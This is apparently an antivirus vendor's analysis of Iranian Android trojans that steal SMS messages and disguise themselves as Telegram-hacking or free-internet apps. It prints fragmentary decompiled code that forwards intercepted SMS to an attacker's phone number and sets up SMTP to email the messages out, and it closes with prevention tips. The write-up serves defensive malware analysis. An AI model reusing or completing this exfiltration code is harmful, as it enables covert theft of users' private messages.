General explanation

Type: Trojan

Degree of destruction: average

Prevalence: average

Malware names:

  • Trojan.Android.SmsSpy.ApkeditorsIrhack (Padvish)
  • Trojan.Android.SmsSend.ApkeditorsIrhack (Padvish)
  • HEUR:Trojan-SMS.AndroidOS.Agent.abr (Kaspersky)
  • Android.Trojan.SMSSend.AQT (BitDefenderFalx)
  • A Variant Of Android/TrojanSMS.Agent.BZW (ESET-NOD32)
  • Android.SmsSend.28203 (DrWeb)
  • ANDROID/TrojanSMS.IBAV.Gen (Avira)

What is the Trojan?

Trojans are malware types that introduce themselves as healthy and legal software and act similar to practical and applicable software but cause many destructions to the system when executing. The downloaded software from the internet, placing HTML text, attaching to an email, etc. are ways that Trojans are using to enter the system. Contrary to viruses and computer worms, Trojans are not reproducible.

What is SmsSend/SmsSpy, the malware family?

There are many Iranian malicious applications with the “Sms Stealer” family name in the diverse Android markets, unauthorized websites, Telegram channels, or infected links sent through SMS. A set of them aimed to access sent/received SMS and send them to a specified number of attacker’s emails that are known as “Com.APKEDITORS.IRHACK.APPS”.

Another set also aimed to send SMS to a specified number by the attacker as soon as the program runs. Their package name is “AMOOGRAM.VAHID.MAIL”. These applications are distributed to users with names such as: Hacking the Telegram, Instagram password recovery, Fee Wi-Fi hack, member finder for channels and groups, free account charging, free internet, server connection, myket, etc.

Technical explanation


– About infected malware set (SMS Stealer) “APKEDITORS.IRHACK.APPS:

This application is “Telegram Hacker”. Immediately after running the program, the malware will first display a message to the user that the app is running, which exit the app after completing the Progress bar and display the following three messages:

1- “This app does not match your device, your Android is not compatible”.

2- “Application is removed”

3- “irhack_apps@”

Immediately after displaying these messages, it will exit the program, and hid the app icon but it is performing its malicious activity in the background.


When the app sends the “Receiving SMS” message through Android, it can access a user’s received SMS according to “android.permission.RECEIVE_SMS” access permission received from the user when installing the application. It will fetch specifications such as (sender phone number and text of the message) from received SMS and will send them to specified numbers using “android.permission.SEND_SMS” permission in the form of a string.

paramContext = (Object[])paramContext.get(“pdus”);

        int i = 0;

        for (;;)


          if (i >= paramContext.length) {



         paramIntent = SmsMessage.createFromPdu((byte[])paramContext[i]);

          this.phoneNumber = paramIntent.getDisplayOriginatingAddress();

          this.messagex = paramIntent.getDisplayMessageBody();

         Log.i(“SmsReceiver”, new StringBuffer().append(new StringBuffer().append(“senderNum:”).append(this.phoneNumber).toString()).append(“; message: “).toString()+this.messagex);



SmsManager.getDefault().sendTextMessage(“09123456789”, (String)nullnew StringBuffer().append(this.phoneNumber).append(“:/n/n”).toString() + this.messagex, (PendingIntent)null, (PendingIntent)null);

Also, the attacker is aimed to send this information to his email address using SMTP protocol. First, it will check the internet status of the user’s phone and finally will collect all data from user’s SMS to its email.

paramIntent.put(“”, “”);

           paramIntent.put(“mail.smtp.socketFactory.port”, “465”);

           paramIntent.put(“mail.smtp.socketFactory.class”, “”);

           paramIntent.put(“mail.smtp.auth”, “true”);

           paramIntent.put(“mail.smtp.port”, “465”);

            this.session = Session.getDefaultInstance(paramIntent, new Authenticator()


              protected PasswordAuthentication getPasswordAuthentication()


                return new PasswordAuthentication(“”, “Password”);



            new RetriveFeedTask().execute(new String[0]);

           i += 1;



    protected String doInBackground(String… paramVarArgs)




       paramVarArgs = new MimeMessage(IncomingSms.this.session);

       paramVarArgs.setFrom(new InternetAddress(“”));



       paramVarArgs.setContent(IncomingSms.this.messagex, “text/html; Charset=utf-8”);


– About the set of infected malware (sending SMS) “AMOOGRAM.VAHID.MAIL”:

The goal of this group of malware is to send messages with “Hacked” text to the specified phone number by the attacker. One of these applications is “Free Internet”.

How to encounter this malware and disinfect the system

To be sure about the safety of your device, install and update the Padvish antivirus database file and scan your device.

How to prevent infection:

  • Avoid downloading and installing applications from unauthorized mobile markets
  • Pay attention to access permission when installing applications.
  • Constantly back up from all of your stored data
  • Do not use unofficial versions. Applications such as Telegram and Instagram has many unofficial versions and most of them are distributed through Telegram channels.


Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>